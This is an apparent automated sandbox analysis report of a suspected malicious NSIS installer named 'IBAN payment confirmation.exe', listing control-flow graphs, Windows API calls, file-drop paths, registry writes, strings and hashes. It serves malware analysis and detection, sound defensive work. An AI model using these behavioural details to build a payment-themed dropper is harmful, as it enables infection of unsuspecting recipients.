                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: "C:\Users\user\Desktop\IBAN payment confirmation.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                              • API String ID: 914957316-2439459934
                                                                                                                              • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                              • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                              • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                              • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 321 403cb6-403cbc 316->321 322 403c9e-403cb0 ShowWindow 316->322 328 403e67-403e82 318->328 324 403e24-403e2f call 401389 319->324 325 403e55-403e57 319->325 329 403cd8-403cdb 321->329 330 403cbe-403cd3 DestroyWindow 321->330 322->321 324->325 340 403e31-403e50 SendMessageW 324->340 325->318 327 4040fc 325->327 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 343 403e97-403ea2 334->343 344 4040ba-4040d3 DestroyWindow EndDialog 334->344 336->327 341 4040e1-4040e7 336->341 338->335 345 403d97-403da5 call 404196 339->345 346 403cfa-403d0b GetDlgItem 339->346 340->335 341->327 350 4040e9-4040f2 ShowWindow 341->350 343->344 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 343->351 344->336 345->335 347 403d2a-403d2d 346->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 346->348 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->345 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->345 361->356 365 403d52-403d58 call 40140b 362->365 366 403d67-403d70 call 40140b 362->366 377 403d5e 365->377 366->345 375 403d72-403d7c 366->375 375->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                              • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                              • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                              • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                              • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3282139019-0
                                                                                                                              • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                              • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                              • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                              • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 432 403013-403018 424->432 433 402f48-402f4b 424->433 426 402e63 425->426 427 402e65-402e72 call 4032f9 425->427 426->427 434 402e78-402e7e 427->434 435 402fcf-402fd7 call 402d1a 427->435 432->417 436 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 433->436 437 402f4d-402f65 call 40330f call 4032f9 433->437 438 402e80-402e98 call 405b11 434->438 439 402efe-402f02 434->439 435->432 463 402fc5-402fca 436->463 464 402fd9-403009 call 40330f call 403062 436->464 437->432 460 402f6b-402f71 437->460 445 402f0b-402f11 438->445 458 402e9a-402ea1 438->458 444 402f04-402f0a call 402d1a 439->444 439->445 444->445 451 402f13-402f21 call 406302 445->451 452 402f24-402f2e 445->452 451->452 452->424 452->425 458->445 462 402ea3-402eaa 458->462 460->432 460->436 462->445 465 402eac-402eb3 462->465 463->417 471 40300e-403011 464->471 465->445 467 402eb5-402ebc 465->467 467->445 470 402ebe-402ede 467->470 470->432 472 402ee4-402ee8 470->472 471->432 473 40301a-40302b 471->473 474 402ef0-402ef8 472->474 475 402eea-402eee 472->475 477 403033-403038 473->477 478 40302d 473->478 474->445 476 402efa-402efc 474->476 475->424 475->474 476->445 479 403039-40303f 477->479 478->477 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IBAN payment confirmation.exe,00000400), ref: 00402DEC
                                                                                                                                • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\IBAN payment confirmation.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IBAN payment confirmation.exe,C:\Users\user\Desktop\IBAN payment confirmation.exe,80000000,00000003), ref: 00402E35
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                              • String ID: "C:\Users\user\Desktop\IBAN payment confirmation.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IBAN payment confirmation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$F$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                              • API String ID: 2803837635-4264661639
                                                                                                                              • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                              • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                              • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                              • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 609 401752-401777 call 402b3a call 4059ac 614 401781-401793 call 405eea call 405935 lstrcatW 609->614 615 401779-40177f call 405eea 609->615 620 401798-401799 call 40617e 614->620 615->620 624 40179e-4017a2 620->624 625 4017a4-4017ae call 40622d 624->625 626 4017d5-4017d8 624->626 633 4017c0-4017d2 625->633 634 4017b0-4017be CompareFileTime 625->634 628 4017e0-4017fc call 405b56 626->628 629 4017da-4017db call 405b31 626->629 636 401870-401899 call 405194 call 403062 628->636 637 4017fe-401801 628->637 629->628 633->626 634->633 649 4018a1-4018ad SetFileTime 636->649 650 40189b-40189f 636->650 638 401852-40185c call 405194 637->638 639 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 637->639 651 401865-40186b 638->651 639->624 671 401847-401848 639->671 654 4018b3-4018be CloseHandle 649->654 650->649 650->654 655 4029d0 651->655 657 4018c4-4018c7 654->657 658 4029c7-4029ca 654->658 659 4029d2-4029d6 655->659 661 4018c9-4018da call 405f0c lstrcatW 657->661 662 4018dc-4018df call 405f0c 657->662 658->655 668 4018e4-402243 call 4056c6 661->668 662->668 668->659 671->651 673 40184a-40184b 671->673 673->638
                                                                                                                              APIs
                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr,?,?,00000031), ref: 00401793
                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr,?,?,00000031), ref: 004017B8
                                                                                                                                • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp$C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr$Call
                                                                                                                              • API String ID: 1941528284-618482122
                                                                                                                              • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                              • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                              • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                              • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 675 402573-402588 call 402b1d 678 4029c7-4029ca 675->678 679 40258e-402595 675->679 682 4029d0-4029d6 678->682 680 402597 679->680 681 40259a-40259d 679->681 680->681 683 4025a3-4025b2 call 405e4a 681->683 684 4026e6-4026ee 681->684 683->684 688 4025b8 683->688 684->678 689 4025be-4025c2 688->689 690 402657-402667 call 405bd9 689->690 691 4025c8-4025e3 ReadFile 689->691 690->684 696 402669 690->696 691->684 693 4025e9-4025ee 691->693 693->684 695 4025f4-402602 693->695 697 4026a2-4026ae call 405e31 695->697 698 402608-40261a MultiByteToWideChar 695->698 699 40266c-40266f 696->699 697->682 698->696 701 40261c-40261f 698->701 699->697 703 402671-402676 699->703 702 402621-40262c 701->702 702->699 705 40262e-402653 SetFilePointer MultiByteToWideChar 702->705 706 4026b3-4026b7 703->706 707 402678-40267d 703->707 705->702 710 402655 705->710 708 4026d4-4026e0 SetFilePointer 706->708 709 4026b9-4026bd 706->709 707->706 711 40267f-402692 707->711 708->684 712 4026c5-4026d2 709->712 713 4026bf-4026c3 709->713 710->696 711->684 714 402694-40269a 711->714 712->684 713->708 713->712 714->689 715 4026a0 714->715 715->684
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                              • String ID: 9
                                                                                                                              • API String ID: 1149667376-2366072709
                                                                                                                              • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                              • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                              • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                              • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 716 40317d-4031a6 GetTickCount 717 4032e7-4032ef call 402d1a 716->717 718 4031ac-4031d7 call 40330f SetFilePointer 716->718 723 4032f1-4032f6 717->723 724 4031dc-4031ee 718->724 725 4031f0 724->725 726 4031f2-403200 call 4032f9 724->726 725->726 729 403206-403212 726->729 730 4032d9-4032dc 726->730 731 403218-40321e 729->731 730->723 732 403220-403226 731->732 733 403249-403265 call 406390 731->733 732->733 734 403228-403248 call 402d1a 732->734 739 4032e2 733->739 740 403267-40326f 733->740 734->733 741 4032e4-4032e5 739->741 742 403271-403287 WriteFile 740->742 743 4032a3-4032a9 740->743 741->723 745 403289-40328d 742->745 746 4032de-4032e0 742->746 743->739 744 4032ab-4032ad 743->744 744->739 748 4032af-4032c2 744->748 745->746 747 40328f-40329b 745->747 746->741 747->731 749 4032a1 747->749 748->724 750 4032c8-4032d7 SetFilePointer 748->750 749->748 750->717
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                              • WriteFile.KERNELBASE(0040BE78,004109A9,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                              • SetFilePointer.KERNELBASE(000066F6,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Pointer$CountTickWrite
                                                                                                                              • String ID: F$x>A
                                                                                                                              • API String ID: 2146148272-503584087
                                                                                                                              • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                              • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                              • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                              • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 751 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 758 4029c7-4029d6 751->758 759 40237d-402385 751->759 761 402387-402394 call 402b3a lstrlenW 759->761 762 402398-40239b 759->762 761->762 765 4023ab-4023ae 762->765 766 40239d-4023aa call 402b1d 762->766 768 4023b0-4023ba call 403062 765->768 769 4023bf-4023d3 RegSetValueExW 765->769 766->765 768->769 773 4023d5 769->773 774 4023d8-4024b2 RegCloseKey 769->774 773->774 774->758 776 402793-40279a 774->776 776->758
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                              • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
